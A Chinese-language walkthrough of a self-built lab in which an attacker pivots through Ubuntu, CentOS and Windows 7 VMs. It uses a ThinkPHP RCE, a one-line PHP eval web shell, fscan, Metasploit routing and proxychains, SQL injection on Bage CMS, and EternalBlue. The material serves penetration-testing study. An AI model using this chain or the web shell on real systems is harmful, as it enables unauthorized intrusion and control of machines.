目录
[拿下bage cms](#拿下bage cms)
[编辑 使用fscan查看内网环境,发现了192.168.110.128这台设备](#编辑 使用fscan查看内网环境,发现了192.168.110.128这台设备)
使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马
环境搭建
准备四台虚拟机
一台虚拟机模拟攻击者,一台kali
三台虚拟机模拟内网环境,一台ubuntu、一台centos、一台window7
kali:这台虚拟上有一张网卡
IP:192.168.244.129(nat)
ubuntu:这台虚拟机上有两张网卡一张是NAT模式,一张是主机模式。
IP:192.168.244.154(nat)、192.168.116.128(主机模式)
centos:这台虚拟机上也有两张网卡一张是主机模式、一张是自定义模式
IP:192.168.116.129(主机模式)、192.168.110.128(自定义模式)
window:这台虚拟机上只有一张网卡
IP:192.168.110.129(自定义模式)
两张网卡如何配置
在编辑中寻找虚拟网络编辑器

三张网卡设置不同网段,如下图
我这里设置的是VMnet8是NAT模式模拟可以访问外网的网段
VMnet1和VMnet0设置的是仅主机模式模拟内网

然后再虚拟机中设置网卡,选择不同的模式,即可完成虚拟机中两张网卡的设置

配置完成网络后kali可以ping通Ubuntu的192.168.244.154,Ubuntu可以ping通centos的192.168.116.129,centos可以ping通windows的192.168.110.129
kali ping ubuntu

ubuntu ping centos

centos ping Windows

Ubuntu配置
这台虚拟机上部署了thinkphp5.0.15的版本,我们一会要借助thinkphp5.0.15上的漏洞进行渗透
渗透
ubuntu的拿下
首先查看网站,这里是thinkphp5.0的版本,说不定会有对应的漏洞。经过查找确实有一个命令执行漏洞

执行后进行测试

执行以下命令写入文件
echo '<?php eval($_POST[123]); ?>' >web.php
然后尝试蚁剑连接,连接成功

centos的拿下
我们在Ubuntu执行ip addr,发现ubuntu有两张网卡,猜测这里说不定有内网环境

探测内网环境
现在有两种方式上马一个msf,或者上传一个fscan
fscan扫描
将对应版本的fscan下载到你蚁剑连接的目标机器上

然后加权扫描,扫描过后多出了result文件,查看result文件。发现再116网段下还有一台机器也就是我们的centos,并且该设备开放了80端口

msf上马
显示系统名、节点名称、操作系统的发行版号、操作系统版本、运行系统的机器 ID 号。

msf生成木马
用python架设一个简单的http服务器
python3 -m http.server
获取木马后,然后将木马传递到你蚁剑连接的主机上

上传成功

加权执行

攻击者kali监听

然后由于116现在是内网,所以现在kali无法访问116网段,我们需要添加一条路由才可以访问,下图是路由情况

添加路由,这里由于现在的会话连接的是ubuntu,所以现在是可以通过会话建立到达116的路由的

然后可以创建一个代理服务器

现在创建的代理是kali的1080端口,这个就相当于我们只要连接本地的1080端口就连接到了msf上面,然后就可以走到116的那个网段
在kali的proxychain中将代理设置好(目录/etc//etc/proxychains4.conf )

然后直接使用proxychains扫描80端口

扫描结果

渗透
我们这里搭建了代理服务器所以可以借助火狐来直接访问,在火狐的设置中设置代理
进入设置

进入代理设置

设置代理,这里的代理就是你在proxychain中设置的代理,你选的那个版本就要那个版本,刚刚在代理中选的是sock 4a所以这里就选4a

设置代理之后就可以访问内网网址了

拿下bage cms
我们首先看一下robots.txt文件

进入目录/index.php?r=admin,进入了cms的后台,在这里可以尝试以下密码爆破
或者密码喷撒,我这里没有尝试

这里有一个sql注入漏洞

将账户密码注入出来,登陆后台

然后审计,发现在这里可以上传文件上传以下试一下
上传成功,这里上传成功

windows的拿下
蚁剑设置代理
蚁剑连接,蚁剑连接192.168.116.129成功

查看现在蚁剑连接的192.168.116.129发现有两张网卡
使用fscan查看内网环境,发现了192.168.110.128这台设备

使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马

将木马发送到192.168.110.129

然后用代理启动msf控制台

msf正向连接

192.168.116.129启动木马

连接成功

添加去往192.168.110.0/网段的路由
然后刚刚用fscan扫描出来的结果说192.168.110.129是一台windows7且可能有永恒之蓝这个漏洞

msf使用永恒之蓝漏洞攻击windows7

设置攻击主机

然后exploit就可以了
我这里windows一直拒绝连接不知道为啥
后经过查询是因为Windows在内网中永恒之蓝所以payload要正向连接才可以